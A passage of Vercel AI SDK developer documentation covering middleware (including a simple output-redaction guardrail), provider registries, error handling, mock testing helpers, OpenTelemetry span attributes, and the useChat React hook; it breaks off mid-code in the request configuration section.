  wrapGenerate: async ({ doGenerate }) => {
    const { text, ...rest } = await doGenerate();

    // filtering approach, e.g. for PII or other sensitive information:
    const cleanedText = text?.replace(/badword/g, '<REDACTED>');

    return { text: cleanedText, ...rest };
  },

  // here you would implement the guardrail logic for streaming
  // Note: streaming guardrails are difficult to implement, because
  // you do not know the full content of the stream until it's finished.
};

Configuring Per Request Custom Metadata

To send and access custom metadata in Middleware, you can use providerOptions. This is useful when building logging middleware where you want to pass additional context like user IDs, timestamps, or other contextual data that can help with tracking and debugging.

import { openai } from '@ai-sdk/openai';
import { generateText, wrapLanguageModel, LanguageModelV1Middleware } from 'ai';

export const yourLogMiddleware: LanguageModelV1Middleware = {
  wrapGenerate: async ({ doGenerate, params }) => {
    console.log('METADATA', params?.providerMetadata?.yourLogMiddleware);
    const result = await doGenerate();
    return result;
  },
};

const { text } = await generateText({
  model: wrapLanguageModel({
    model: openai('gpt-4o'),
    middleware: yourLogMiddleware,
  }),
  prompt: 'Invent a new holiday and describe its traditions.',
  providerOptions: {
    yourLogMiddleware: {
      hello: 'world',
    },
  },
});

console.log(text);

title: Provider & Model Management description: Learn how to work with multiple providers and models

Provider & Model Management

When you work with multiple providers and models, it is often desirable to manage them in a central place and access the models through simple string ids.

The AI SDK offers custom providers and a provider registry for this purpose:

With custom providers, you can pre-configure model settings, provide model name aliases, and limit the available models.
The provider registry lets you mix multiple providers and access them through simple string ids.

You can mix and match custom providers, the provider registry, and middleware in your application.

Custom Providers

You can create a custom provider using customProvider.

Example: custom model settings

You might want to override the default model settings for a provider or provide model name aliases with pre-configured settings.

import { openai as originalOpenAI } from '@ai-sdk/openai';
import { customProvider } from 'ai';

// custom provider with different model settings:
export const openai = customProvider({
  languageModels: {
    // replacement model with custom settings:
    'gpt-4o': originalOpenAI('gpt-4o', { structuredOutputs: true }),
    // alias model with custom settings:
    'gpt-4o-mini-structured': originalOpenAI('gpt-4o-mini', {
      structuredOutputs: true,
    }),
  },
  fallbackProvider: originalOpenAI,
});

Example: model name alias

You can also provide model name aliases, so you can update the model version in one place in the future:

import { anthropic as originalAnthropic } from '@ai-sdk/anthropic';
import { customProvider } from 'ai';

// custom provider with alias names:
export const anthropic = customProvider({
  languageModels: {
    opus: originalAnthropic('claude-3-opus-20240229'),
    sonnet: originalAnthropic('claude-3-5-sonnet-20240620'),
    haiku: originalAnthropic('claude-3-haiku-20240307'),
  },
  fallbackProvider: originalAnthropic,
});

Example: limit available models

You can limit the available models in the system, even if you have multiple providers.

import { anthropic } from '@ai-sdk/anthropic';
import { openai } from '@ai-sdk/openai';
import { customProvider } from 'ai';

export const myProvider = customProvider({
  languageModels: {
    'text-medium': anthropic('claude-3-5-sonnet-20240620'),
    'text-small': openai('gpt-4o-mini'),
    'structure-medium': openai('gpt-4o', { structuredOutputs: true }),
    'structure-fast': openai('gpt-4o-mini', { structuredOutputs: true }),
  },
  embeddingModels: {
    emdedding: openai.textEmbeddingModel('text-embedding-3-small'),
  },
  // no fallback provider
});

Provider Registry

You can create a provider registry with multiple providers and models using createProviderRegistry.

Setup

import { anthropic } from '@ai-sdk/anthropic';
import { createOpenAI } from '@ai-sdk/openai';
import { createProviderRegistry } from 'ai';

export const registry = createProviderRegistry({
  // register provider with prefix and default setup:
  anthropic,

  // register provider with prefix and custom setup:
  openai: createOpenAI({
    apiKey: process.env.OPENAI_API_KEY,
  }),
});

Setup with Custom Separator

By default, the registry uses : as the separator between provider and model IDs. You can customize this separator:

import { anthropic } from '@ai-sdk/anthropic';
import { openai } from '@ai-sdk/openai';

export const customSeparatorRegistry = createProviderRegistry(
  {
    anthropic,
    openai,
  },
  { separator: ' > ' },
);

Example: Use language models

You can access language models by using the languageModel method on the registry. The provider id will become the prefix of the model id: providerId:modelId.

import { generateText } from 'ai';
import { registry } from './registry';

const { text } = await generateText({
  model: registry.languageModel('openai:gpt-4-turbo'), // default separator
  // or with custom separator:
  // model: customSeparatorRegistry.languageModel('openai > gpt-4-turbo'),
  prompt: 'Invent a new holiday and describe its traditions.',
});

Example: Use text embedding models

You can access text embedding models by using the textEmbeddingModel method on the registry. The provider id will become the prefix of the model id: providerId:modelId.

import { embed } from 'ai';
import { registry } from './registry';

const { embedding } = await embed({
  model: registry.textEmbeddingModel('openai:text-embedding-3-small'),
  value: 'sunny day at the beach',
});

Example: Use image models

You can access image models by using the imageModel method on the registry. The provider id will become the prefix of the model id: providerId:modelId.

import { generateImage } from 'ai';
import { registry } from './registry';

const { image } = await generateImage({
  model: registry.imageModel('openai:dall-e-3'),
  prompt: 'A beautiful sunset over a calm ocean',
});

Combining Custom Providers, Provider Registry, and Middleware

The central idea of provider management is to set up a file that contains all the providers and models you want to use. You may want to pre-configure model settings, provide model name aliases, limit the available models, and more.

Here is an example that implements the following concepts:

pass through a full provider with a namespace prefix (here: xai > *)
setup an OpenAI-compatible provider with custom api key and base URL (here: custom > *)
setup model name aliases (here: anthropic > fast, anthropic > writing, anthropic > reasoning)
pre-configure model settings (here: anthropic > reasoning)
validate the provider-specific options (here: AnthropicProviderOptions)
use a fallback provider (here: anthropic > *)
limit a provider to certain models without a fallback (here: groq > gemma2-9b-it, groq > qwen-qwq-32b)
define a custom separator for the provider registry (here: >)

import { anthropic, AnthropicProviderOptions } from '@ai-sdk/anthropic';
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { xai } from '@ai-sdk/xai';
import { groq } from '@ai-sdk/groq';
import {
  createProviderRegistry,
  customProvider,
  defaultSettingsMiddleware,
  wrapLanguageModel,
} from 'ai';

export const registry = createProviderRegistry(
  {
    // pass through a full provider with a namespace prefix
    xai,

    // access an OpenAI-compatible provider with custom setup
    custom: createOpenAICompatible({
      name: 'provider-name',
      apiKey: process.env.CUSTOM_API_KEY,
      baseURL: 'https://api.custom.com/v1',
    }),

    // setup model name aliases
    anthropic: customProvider({
      languageModels: {
        fast: anthropic('claude-3-haiku-20240307'),

        // simple model
        writing: anthropic('claude-3-7-sonnet-20250219'),

        // extended reasoning model configuration:
        reasoning: wrapLanguageModel({
          model: anthropic('claude-3-7-sonnet-20250219'),
          middleware: defaultSettingsMiddleware({
            settings: {
              maxTokens: 100000, // example default setting
              providerMetadata: {
                anthropic: {
                  thinking: {
                    type: 'enabled',
                    budgetTokens: 32000,
                  },
                } satisfies AnthropicProviderOptions,
              },
            },
          }),
        }),
      },
      fallbackProvider: anthropic,
    }),

    // limit a provider to certain models without a fallback
    groq: customProvider({
      languageModels: {
        'gemma2-9b-it': groq('gemma2-9b-it'),
        'qwen-qwq-32b': groq('qwen-qwq-32b'),
      },
    }),
  },
  { separator: ' > ' },
);

// usage:
const model = registry.languageModel('anthropic > reasoning');

title: Error Handling description: Learn how to handle errors in the AI SDK Core

Error Handling

Handling regular errors

Regular errors are thrown and can be handled using the try/catch block.

import { generateText } from 'ai';

try {
  const { text } = await generateText({
    model: yourModel,
    prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  });
} catch (error) {
  // handle error
}

See Error Types for more information on the different types of errors that may be thrown.

Handling streaming errors (simple streams)

When errors occur during streams that do not support error chunks, the error is thrown as a regular error. You can handle these errors using the try/catch block.

import { generateText } from 'ai';

try {
  const { textStream } = streamText({
    model: yourModel,
    prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  });

  for await (const textPart of textStream) {
    process.stdout.write(textPart);
  }
} catch (error) {
  // handle error
}

Handling streaming errors (streaming with `error` support)

Full streams support error parts. You can handle those parts similar to other parts. It is recommended to also add a try-catch block for errors that happen outside of the streaming.

import { generateText } from 'ai';

try {
  const { fullStream } = streamText({
    model: yourModel,
    prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  });

  for await (const part of fullStream) {
    switch (part.type) {
      // ... handle other part types

      case 'error': {
        const error = part.error;
        // handle error
        break;
      }
    }
  }
} catch (error) {
  // handle error
}

title: Testing description: Learn how to use AI SDK Core mock providers for testing.

Testing

Testing language models can be challenging, because they are non-deterministic and calling them is slow and expensive.

To enable you to unit test your code that uses the AI SDK, the AI SDK Core includes mock providers and test helpers. You can import the following helpers from ai/test:

MockEmbeddingModelV1: A mock embedding model using the embedding model v1 specification.
MockLanguageModelV1: A mock language model using the language model v1 specification.
mockId: Provides an incrementing integer ID.
mockValues: Iterates over an array of values with each call. Returns the last value when the array is exhausted.
simulateReadableStream: Simulates a readable stream with delays.

With mock providers and test helpers, you can control the output of the AI SDK and test your code in a repeatable and deterministic way without actually calling a language model provider.

Examples

You can use the test helpers with the AI Core functions in your unit tests:

generateText

import { generateText } from 'ai';
import { MockLanguageModelV1 } from 'ai/test';

const result = await generateText({
  model: new MockLanguageModelV1({
    doGenerate: async () => ({
      rawCall: { rawPrompt: null, rawSettings: {} },
      finishReason: 'stop',
      usage: { promptTokens: 10, completionTokens: 20 },
      text: `Hello, world!`,
    }),
  }),
  prompt: 'Hello, test!',
});

streamText

import { streamText, simulateReadableStream } from 'ai';
import { MockLanguageModelV1 } from 'ai/test';

const result = streamText({
  model: new MockLanguageModelV1({
    doStream: async () => ({
      stream: simulateReadableStream({
        chunks: [
          { type: 'text-delta', textDelta: 'Hello' },
          { type: 'text-delta', textDelta: ', ' },
          { type: 'text-delta', textDelta: `world!` },
          {
            type: 'finish',
            finishReason: 'stop',
            logprobs: undefined,
            usage: { completionTokens: 10, promptTokens: 3 },
          },
        ],
      }),
      rawCall: { rawPrompt: null, rawSettings: {} },
    }),
  }),
  prompt: 'Hello, test!',
});

generateObject

import { generateObject } from 'ai';
import { MockLanguageModelV1 } from 'ai/test';
import { z } from 'zod';

const result = await generateObject({
  model: new MockLanguageModelV1({
    defaultObjectGenerationMode: 'json',
    doGenerate: async () => ({
      rawCall: { rawPrompt: null, rawSettings: {} },
      finishReason: 'stop',
      usage: { promptTokens: 10, completionTokens: 20 },
      text: `{"content":"Hello, world!"}`,
    }),
  }),
  schema: z.object({ content: z.string() }),
  prompt: 'Hello, test!',
});

streamObject

import { streamObject, simulateReadableStream } from 'ai';
import { MockLanguageModelV1 } from 'ai/test';
import { z } from 'zod';

const result = streamObject({
  model: new MockLanguageModelV1({
    defaultObjectGenerationMode: 'json',
    doStream: async () => ({
      stream: simulateReadableStream({
        chunks: [
          { type: 'text-delta', textDelta: '{ ' },
          { type: 'text-delta', textDelta: '"content": ' },
          { type: 'text-delta', textDelta: `"Hello, ` },
          { type: 'text-delta', textDelta: `world` },
          { type: 'text-delta', textDelta: `!"` },
          { type: 'text-delta', textDelta: ' }' },
          {
            type: 'finish',
            finishReason: 'stop',
            logprobs: undefined,
            usage: { completionTokens: 10, promptTokens: 3 },
          },
        ],
      }),
      rawCall: { rawPrompt: null, rawSettings: {} },
    }),
  }),
  schema: z.object({ content: z.string() }),
  prompt: 'Hello, test!',
});

Simulate Data Stream Protocol Responses

You can also simulate Data Stream Protocol responses for testing, debugging, or demonstration purposes.

Here is a Next example:

import { simulateReadableStream } from 'ai';

export async function POST(req: Request) {
  return new Response(
    simulateReadableStream({
      initialDelayInMs: 1000, // Delay before the first chunk
      chunkDelayInMs: 300, // Delay between chunks
      chunks: [
        `0:"This"\n`,
        `0:" is an"\n`,
        `0:"example."\n`,
        `e:{"finishReason":"stop","usage":{"promptTokens":20,"completionTokens":50},"isContinued":false}\n`,
        `d:{"finishReason":"stop","usage":{"promptTokens":20,"completionTokens":50}}\n`,
      ],
    }).pipeThrough(new TextEncoderStream()),
    {
      status: 200,
      headers: {
        'X-Vercel-AI-Data-Stream': 'v1',
        'Content-Type': 'text/plain; charset=utf-8',
      },
    },
  );
}

title: Telemetry description: Using OpenTelemetry with AI SDK Core

Telemetry

The AI SDK uses OpenTelemetry to collect telemetry data. OpenTelemetry is an open-source observability framework designed to provide standardized instrumentation for collecting telemetry data.

Check out the AI SDK Observability Integrations to see providers that offer monitoring and tracing for AI SDK applications.

Enabling telemetry

For Next.js applications, please follow the Next.js OpenTelemetry guide to enable telemetry first.

You can then use the experimental_telemetry option to enable telemetry on specific function calls while the feature is experimental:

const result = await generateText({
  model: openai('gpt-4-turbo'),
  prompt: 'Write a short story about a cat.',
  experimental_telemetry: { isEnabled: true },
});

When telemetry is enabled, you can also control if you want to record the input values and the output values for the function. By default, both are enabled. You can disable them by setting the recordInputs and recordOutputs options to false.

Disabling the recording of inputs and outputs can be useful for privacy, data transfer, and performance reasons. You might for example want to disable recording inputs if they contain sensitive information.

Telemetry Metadata

You can provide a functionId to identify the function that the telemetry data is for, and metadata to include additional information in the telemetry data.

const result = await generateText({
  model: openai('gpt-4-turbo'),
  prompt: 'Write a short story about a cat.',
  experimental_telemetry: {
    isEnabled: true,
    functionId: 'my-awesome-function',
    metadata: {
      something: 'custom',
      someOtherThing: 'other-value',
    },
  },
});

Custom Tracer

You may provide a tracer which must return an OpenTelemetry Tracer. This is useful in situations where you want your traces to use a TracerProvider other than the one provided by the @opentelemetry/api singleton.

const tracerProvider = new NodeTracerProvider();
const result = await generateText({
  model: openai('gpt-4-turbo'),
  prompt: 'Write a short story about a cat.',
  experimental_telemetry: {
    isEnabled: true,
    tracer: tracerProvider.getTracer('ai'),
  },
});

Collected Data

generateText function

generateText records 3 types of spans:

ai.generateText (span): the full length of the generateText call. It contains 1 or more ai.generateText.doGenerate spans. It contains the basic LLM span information and the following attributes:
- operation.name: ai.generateText and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.generateText"
- ai.prompt: the prompt that was used when calling generateText
- ai.response.text: the text that was generated
- ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
- ai.response.finishReason: the reason why the generation finished
- ai.settings.maxSteps: the maximum number of steps that were set
ai.generateText.doGenerate (span): a provider doGenerate call. It can contain ai.toolCall spans. It contains the call LLM span information and the following attributes:
- operation.name: ai.generateText.doGenerate and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.generateText.doGenerate"
- ai.prompt.format: the format of the prompt
- ai.prompt.messages: the messages that were passed into the provider
- ai.prompt.tools: array of stringified tool definitions. The tools can be of type function or provider-defined. Function tools have a name, description (optional), and parameters (JSON schema). Provider-defined tools have a name, id, and args (Record).
- ai.prompt.toolChoice: the stringified tool choice setting (JSON). It has a type property (auto, none, required, tool), and if the type is tool, a toolName property with the specific tool.
- ai.response.text: the text that was generated
- ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
- ai.response.finishReason: the reason why the generation finished
ai.toolCall (span): a tool call that is made as part of the generateText call. See Tool call spans for more details.

streamText function

streamText records 3 types of spans and 2 types of events:

ai.streamText (span): the full length of the streamText call. It contains a ai.streamText.doStream span. It contains the basic LLM span information and the following attributes:
- operation.name: ai.streamText and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.streamText"
- ai.prompt: the prompt that was used when calling streamText
- ai.response.text: the text that was generated
- ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
- ai.response.finishReason: the reason why the generation finished
- ai.settings.maxSteps: the maximum number of steps that were set
ai.streamText.doStream (span): a provider doStream call. This span contains an ai.stream.firstChunk event and ai.toolCall spans. It contains the call LLM span information and the following attributes:
- operation.name: ai.streamText.doStream and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.streamText.doStream"
- ai.prompt.format: the format of the prompt
- ai.prompt.messages: the messages that were passed into the provider
- ai.prompt.tools: array of stringified tool definitions. The tools can be of type function or provider-defined. Function tools have a name, description (optional), and parameters (JSON schema). Provider-defined tools have a name, id, and args (Record).
- ai.prompt.toolChoice: the stringified tool choice setting (JSON). It has a type property (auto, none, required, tool), and if the type is tool, a toolName property with the specific tool.
- ai.response.text: the text that was generated
- ai.response.toolCalls: the tool calls that were made as part of the generation (stringified JSON)
- ai.response.msToFirstChunk: the time it took to receive the first chunk in milliseconds
- ai.response.msToFinish: the time it took to receive the finish part of the LLM stream in milliseconds
- ai.response.avgCompletionTokensPerSecond: the average number of completion tokens per second
- ai.response.finishReason: the reason why the generation finished
ai.toolCall (span): a tool call that is made as part of the generateText call. See Tool call spans for more details.
ai.stream.firstChunk (event): an event that is emitted when the first chunk of the stream is received.
- ai.response.msToFirstChunk: the time it took to receive the first chunk
ai.stream.finish (event): an event that is emitted when the finish part of the LLM stream is received.

It also records a ai.stream.firstChunk event when the first chunk of the stream is received.

generateObject function

generateObject records 2 types of spans:

ai.generateObject (span): the full length of the generateObject call. It contains 1 or more ai.generateObject.doGenerate spans. It contains the basic LLM span information and the following attributes:
- operation.name: ai.generateObject and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.generateObject"
- ai.prompt: the prompt that was used when calling generateObject
- ai.schema: Stringified JSON schema version of the schema that was passed into the generateObject function
- ai.schema.name: the name of the schema that was passed into the generateObject function
- ai.schema.description: the description of the schema that was passed into the generateObject function
- ai.response.object: the object that was generated (stringified JSON)
- ai.settings.mode: the object generation mode, e.g. json
- ai.settings.output: the output type that was used, e.g. object or no-schema
ai.generateObject.doGenerate (span): a provider doGenerate call. It contains the call LLM span information and the following attributes:
- operation.name: ai.generateObject.doGenerate and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.generateObject.doGenerate"
- ai.prompt.format: the format of the prompt
- ai.prompt.messages: the messages that were passed into the provider
- ai.response.object: the object that was generated (stringified JSON)
- ai.settings.mode: the object generation mode
- ai.response.finishReason: the reason why the generation finished

streamObject function

streamObject records 2 types of spans and 1 type of event:

ai.streamObject (span): the full length of the streamObject call. It contains 1 or more ai.streamObject.doStream spans. It contains the basic LLM span information and the following attributes:
- operation.name: ai.streamObject and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.streamObject"
- ai.prompt: the prompt that was used when calling streamObject
- ai.schema: Stringified JSON schema version of the schema that was passed into the streamObject function
- ai.schema.name: the name of the schema that was passed into the streamObject function
- ai.schema.description: the description of the schema that was passed into the streamObject function
- ai.response.object: the object that was generated (stringified JSON)
- ai.settings.mode: the object generation mode, e.g. json
- ai.settings.output: the output type that was used, e.g. object or no-schema
ai.streamObject.doStream (span): a provider doStream call. This span contains an ai.stream.firstChunk event. It contains the call LLM span information and the following attributes:
- operation.name: ai.streamObject.doStream and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.streamObject.doStream"
- ai.prompt.format: the format of the prompt
- ai.prompt.messages: the messages that were passed into the provider
- ai.settings.mode: the object generation mode
- ai.response.object: the object that was generated (stringified JSON)
- ai.response.msToFirstChunk: the time it took to receive the first chunk
- ai.response.finishReason: the reason why the generation finished
ai.stream.firstChunk (event): an event that is emitted when the first chunk of the stream is received.
- ai.response.msToFirstChunk: the time it took to receive the first chunk

embed function

embed records 2 types of spans:

ai.embed (span): the full length of the embed call. It contains 1 ai.embed.doEmbed spans. It contains the basic embedding span information and the following attributes:
- operation.name: ai.embed and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.embed"
- ai.value: the value that was passed into the embed function
- ai.embedding: a JSON-stringified embedding
ai.embed.doEmbed (span): a provider doEmbed call. It contains the basic embedding span information and the following attributes:
- operation.name: ai.embed.doEmbed and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.embed.doEmbed"
- ai.values: the values that were passed into the provider (array)
- ai.embeddings: an array of JSON-stringified embeddings

embedMany function

embedMany records 2 types of spans:

ai.embedMany (span): the full length of the embedMany call. It contains 1 or more ai.embedMany.doEmbed spans. It contains the basic embedding span information and the following attributes:
- operation.name: ai.embedMany and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.embedMany"
- ai.values: the values that were passed into the embedMany function
- ai.embeddings: an array of JSON-stringified embedding
ai.embedMany.doEmbed (span): a provider doEmbed call. It contains the basic embedding span information and the following attributes:
- operation.name: ai.embedMany.doEmbed and the functionId that was set through telemetry.functionId
- ai.operationId: "ai.embedMany.doEmbed"
- ai.values: the values that were sent to the provider
- ai.embeddings: an array of JSON-stringified embeddings for each value

Span Details

Basic LLM span information

Many spans that use LLMs (ai.generateText, ai.generateText.doGenerate, ai.streamText, ai.streamText.doStream, ai.generateObject, ai.generateObject.doGenerate, ai.streamObject, ai.streamObject.doStream) contain the following attributes:

resource.name: the functionId that was set through telemetry.functionId
ai.model.id: the id of the model
ai.model.provider: the provider of the model
ai.request.headers.*: the request headers that were passed in through headers
ai.response.providerMetadata: provider specific metadata returned with the generation response
ai.settings.maxRetries: the maximum number of retries that were set
ai.telemetry.functionId: the functionId that was set through telemetry.functionId
ai.telemetry.metadata.*: the metadata that was passed in through telemetry.metadata
ai.usage.completionTokens: the number of completion tokens that were used
ai.usage.promptTokens: the number of prompt tokens that were used

Call LLM span information

Spans that correspond to individual LLM calls (ai.generateText.doGenerate, ai.streamText.doStream, ai.generateObject.doGenerate, ai.streamObject.doStream) contain basic LLM span information and the following attributes:

ai.response.model: the model that was used to generate the response. This can be different from the model that was requested if the provider supports aliases.
ai.response.id: the id of the response. Uses the ID from the provider when available.
ai.response.timestamp: the timestamp of the response. Uses the timestamp from the provider when available.
Semantic Conventions for GenAI operations
- gen_ai.system: the provider that was used
- gen_ai.request.model: the model that was requested
- gen_ai.request.temperature: the temperature that was set
- gen_ai.request.max_tokens: the maximum number of tokens that were set
- gen_ai.request.frequency_penalty: the frequency penalty that was set
- gen_ai.request.presence_penalty: the presence penalty that was set
- gen_ai.request.top_k: the topK parameter value that was set
- gen_ai.request.top_p: the topP parameter value that was set
- gen_ai.request.stop_sequences: the stop sequences
- gen_ai.response.finish_reasons: the finish reasons that were returned by the provider
- gen_ai.response.model: the model that was used to generate the response. This can be different from the model that was requested if the provider supports aliases.
- gen_ai.response.id: the id of the response. Uses the ID from the provider when available.
- gen_ai.usage.input_tokens: the number of prompt tokens that were used
- gen_ai.usage.output_tokens: the number of completion tokens that were used

Basic embedding span information

Many spans that use embedding models (ai.embed, ai.embed.doEmbed, ai.embedMany, ai.embedMany.doEmbed) contain the following attributes:

ai.model.id: the id of the model
ai.model.provider: the provider of the model
ai.request.headers.*: the request headers that were passed in through headers
ai.response.providerMetadata: provider specific metadata returned with the generation response
ai.settings.maxRetries: the maximum number of retries that were set
ai.telemetry.functionId: the functionId that was set through telemetry.functionId
ai.telemetry.metadata.*: the metadata that was passed in through telemetry.metadata
ai.usage.tokens: the number of tokens that were used
resource.name: the functionId that was set through telemetry.functionId

Tool call spans

Tool call spans (ai.toolCall) contain the following attributes:

operation.name: "ai.toolCall"
ai.operationId: "ai.toolCall"
ai.toolCall.name: the name of the tool
ai.toolCall.id: the id of the tool call
ai.toolCall.args: the parameters of the tool call
ai.toolCall.result: the result of the tool call. Only available if the tool call is successful and the result is serializable.

title: Overview description: An overview of AI SDK UI.

AI SDK UI

AI SDK UI is designed to help you build interactive chat, completion, and assistant applications with ease. It is a framework-agnostic toolkit, streamlining the integration of advanced AI functionalities into your applications.

AI SDK UI provides robust abstractions that simplify the complex tasks of managing chat streams and UI updates on the frontend, enabling you to develop dynamic AI-driven interfaces more efficiently. With four main hooks — useChat, useCompletion, useObject, and useAssistant — you can incorporate real-time chat capabilities, text completions, streamed JSON, and interactive assistant features into your app.

useChat offers real-time streaming of chat messages, abstracting state management for inputs, messages, loading, and errors, allowing for seamless integration into any UI design.
useCompletion enables you to handle text completions in your applications, managing the prompt input and automatically updating the UI as new completions are streamed.
useObject is a hook that allows you to consume streamed JSON objects, providing a simple way to handle and display structured data in your application.
useAssistant is designed to facilitate interaction with OpenAI-compatible assistant APIs, managing UI state and updating it automatically as responses are streamed.

These hooks are designed to reduce the complexity and time required to implement AI interactions, letting you focus on creating exceptional user experiences.

UI Framework Support

AI SDK UI supports the following frameworks: React, Svelte, Vue.js, and SolidJS (deprecated). Here is a comparison of the supported functions across these frameworks:

Function	React	Svelte	Vue.js	SolidJS (deprecated)
useChat		Chat
useCompletion		Completion
useObject		StructuredObject
useAssistant

API Reference

Please check out the AI SDK UI API Reference for more details on each function.

title: Chatbot description: Learn how to use the useChat hook.

Chatbot

The useChat hook makes it effortless to create a conversational user interface for your chatbot application. It enables the streaming of chat messages from your AI provider, manages the chat state, and updates the UI automatically as new messages arrive.

To summarize, the useChat hook provides the following features:

Message Streaming: All the messages from the AI provider are streamed to the chat UI in real-time.
Managed States: The hook manages the states for input, messages, status, error and more for you.
Seamless Integration: Easily integrate your chat AI into any design or layout with minimal effort.

In this guide, you will learn how to use the useChat hook to create a chatbot application with real-time message streaming. Check out our chatbot with tools guide to learn how to use tools in your chatbot. Let's start with the following example first.

Example

'use client';

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const { messages, input, handleInputChange, handleSubmit } = useChat({});

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.content}
        </div>
      ))}

      <form onSubmit={handleSubmit}>
        <input name="prompt" value={input} onChange={handleInputChange} />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';

// Allow streaming responses up to 30 seconds
export const maxDuration = 30;

export async function POST(req: Request) {
  const { messages } = await req.json();

  const result = streamText({
    model: openai('gpt-4-turbo'),
    system: 'You are a helpful assistant.',
    messages,
  });

  return result.toDataStreamResponse();
}

In the Page component, the useChat hook will request to your AI provider endpoint whenever the user submits a message. The messages are then streamed back in real-time and displayed in the chat UI.

This enables a seamless chat experience where the user can see the AI response as soon as it is available, without having to wait for the entire response to be received.

Customized UI

useChat also provides ways to manage the chat message and input states via code, show status, and update messages without being triggered by user interactions.

Status

The useChat hook returns a status. It has the following possible values:

submitted: The message has been sent to the API and we're awaiting the start of the response stream.
streaming: The response is actively streaming in from the API, receiving chunks of data.
ready: The full response has been received and processed; a new user message can be submitted.
error: An error occurred during the API request, preventing successful completion.

You can use status for e.g. the following purposes:

To show a loading spinner while the chatbot is processing the user's message.
To show a "Stop" button to abort the current message.
To disable the submit button.

'use client';

import { useChat } from '@ai-sdk/react';

export default function Page() {
  const { messages, input, handleInputChange, handleSubmit, status, stop } =
    useChat({});

  return (
    <>
      {messages.map(message => (
        <div key={message.id}>
          {message.role === 'user' ? 'User: ' : 'AI: '}
          {message.content}
        </div>
      ))}

      {(status === 'submitted' || status === 'streaming') && (
        <div>
          {status === 'submitted' && <Spinner />}
          <button type="button" onClick={() => stop()}>
            Stop
          </button>
        </div>
      )}

      <form onSubmit={handleSubmit}>
        <input
          name="prompt"
          value={input}
          onChange={handleInputChange}
          disabled={status !== 'ready'}
        />
        <button type="submit">Submit</button>
      </form>
    </>
  );
}

Error State

Similarly, the error state reflects the error object thrown during the fetch request. It can be used to display an error message, disable the submit button, or show a retry button:

'use client';

import { useChat } from '@ai-sdk/react';

export default function Chat() {
  const { messages, input, handleInputChange, handleSubmit, error, reload } =
    useChat({});

  return (
    <div>
      {messages.map(m => (
        <div key={m.id}>
          {m.role}: {m.content}
        </div>
      ))}

      {error && (
        <>
          <div>An error occurred.</div>
          <button type="button" onClick={() => reload()}>
            Retry
          </button>
        </>
      )}

      <form onSubmit={handleSubmit}>
        <input
          value={input}
          onChange={handleInputChange}
          disabled={error != null}
        />
      </form>
    </div>
  );
}

Please also see the error handling guide for more information.

Modify messages

Sometimes, you may want to directly modify some existing messages. For example, a delete button can be added to each message to allow users to remove them from the chat history.

The setMessages function can help you achieve these tasks:

const { messages, setMessages, ... } = useChat()

const handleDelete = (id) => {
  setMessages(messages.filter(message => message.id !== id))
}

return <>
  {messages.map(message => (
    <div key={message.id}>
      {message.role === 'user' ? 'User: ' : 'AI: '}
      {message.content}
      <button onClick={() => handleDelete(message.id)}>Delete</button>
    </div>
  ))}
  ...

You can think of messages and setMessages as a pair of state and setState in React.

Controlled input

In the initial example, we have handleSubmit and handleInputChange callbacks that manage the input changes and form submissions. These are handy for common use cases, but you can also use uncontrolled APIs for more advanced scenarios such as form validation or customized components.

The following example demonstrates how to use more granular APIs like setInput and append with your custom input and submit button components:

const { input, setInput, append } = useChat()

return <>
  <MyCustomInput value={input} onChange={value => setInput(value)} />
  <MySubmitButton onClick={() => {
    // Send a new message to the AI provider
    append({
      role: 'user',
      content: input,
    })
  }}/>
  ...

Cancellation and regeneration

It's also a common use case to abort the response message while it's still streaming back from the AI provider. You can do this by calling the stop function returned by the useChat hook.

const { stop, status, ... } = useChat()

return <>
  <button onClick={stop} disabled={!(status === 'streaming' || status === 'submitted')}>Stop</button>
  ...

When the user clicks the "Stop" button, the fetch request will be aborted. This avoids consuming unnecessary resources and improves the UX of your chatbot application.

Similarly, you can also request the AI provider to reprocess the last message by calling the reload function returned by the useChat hook:

const { reload, status, ... } = useChat()

return <>
  <button onClick={reload} disabled={!(status === 'ready' || status === 'error')}>Regenerate</button>
  ...
</>

When the user clicks the "Regenerate" button, the AI provider will regenerate the last message and replace the current one correspondingly.

Throttling UI Updates

This feature is currently only available for React.

By default, the useChat hook will trigger a render every time a new chunk is received. You can throttle the UI updates with the experimental_throttle option.

const { messages, ... } = useChat({
  // Throttle the messages and data updates to 50ms:
  experimental_throttle: 50
})

Event Callbacks

useChat provides optional event callbacks that you can use to handle different stages of the chatbot lifecycle:

onFinish: Called when the assistant message is completed
onError: Called when an error occurs during the fetch request.
onResponse: Called when the response from the API is received.

These callbacks can be used to trigger additional actions, such as logging, analytics, or custom UI updates.

import { Message } from '@ai-sdk/react';

const {
  /* ... */
} = useChat({
  onFinish: (message, { usage, finishReason }) => {
    console.log('Finished streaming message:', message);
    console.log('Token usage:', usage);
    console.log('Finish reason:', finishReason);
  },
  onError: error => {
    console.error('An error occurred:', error);
  },
  onResponse: response => {
    console.log('Received HTTP response from server:', response);
  },
});

It's worth noting that you can abort the processing by throwing an error in the onResponse callback. This will trigger the onError callback and stop the message from being appended to the chat UI. This can be useful for handling unexpected responses from the AI provider.

Request Configuration

Custom headers, body, and credentials

By default, the useChat hook sends a HTTP POST request to the /api/chat endpoint with the message list as the request body. You can customize the request by passing additional options to the useChat hook:

const { messages, input, handleInputChange, handleSubmit } = useChat({
  api: '/api/custom-chat',
